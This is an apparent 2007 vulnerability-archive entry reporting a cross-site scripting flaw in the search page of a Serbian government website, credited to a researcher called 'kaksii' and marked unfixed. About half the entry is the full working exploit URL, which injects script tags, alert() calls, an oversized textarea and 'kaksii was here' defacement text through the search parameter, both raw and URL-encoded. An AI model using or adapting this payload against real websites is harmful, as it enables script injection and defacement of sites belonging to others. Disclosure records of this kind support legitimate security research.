Security researcher kaksii, has submitted on 31/10/2007 a cross-site-scripting (XSS) vulnerability affecting www.drzavnauprava.sr.gov.yu, which at the time of submission ranked 4943 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 04/11/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 31/10/2007 |
Date published: 04/11/2007 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: kaksii |
Domain: www.drzavnauprava.sr.gov.yu |
Category: XSS |
Pagerank: 4943 |
|---|
URL: http://www.drzavnauprava.sr.gov.yu/misc/pretraga.php?txtKeyword="><script>alert(1)</script></textare
a><script>alert("kaksii_was_here")<script>alert('kaksii_was_here');alert(1)</script>"</html><html><s
cript>alert(10111)</script><div%20align=center>%20<font%20size=4><textarea%20name=1%20cols=100000%20
rows=10000%20id=1>kaksii%20was%20here</textarea></font></div><noscript><plaintext>%3E%3Cscript%3Eale
rt%28%22kaksii_was_here%22%29%3Cscript%3Ealert%28%27kaksii_was_here%27%29%3Balert%281%29%3C%2Fscript
%3E%22%3C%2Fhtml%3E%3Chtml%3E%3Cscript%3Ealert%2810111%29%3C%2Fscript%3E%3Cdiv%2520align%3Dcenter%3E
%2520%3Cfont%2520size%3D4%3E%3Ctextarea%2520name%3D1%2520cols%3D100000%2520rows%3D10000%2520id%3D1%3
Ekaksii%2520was%2520here%3C%2Ftextarea%3E%3C%2Ffont%3E%3C%2Fdiv%3E%3Cnoscript%3E%3Cplaintext%3E&cate
gory=-1&andor=OR&date_from_day=01&date_from_month=01&date_from_year=2001&date_from=2001-01-01&date_t
o_day=31&date_to_month=10&date_to_year=2007&date_to=2007-10-31&sort_by=date&asc_desc=DESC |
|
Click here to view the mirror
|
|
|
| 
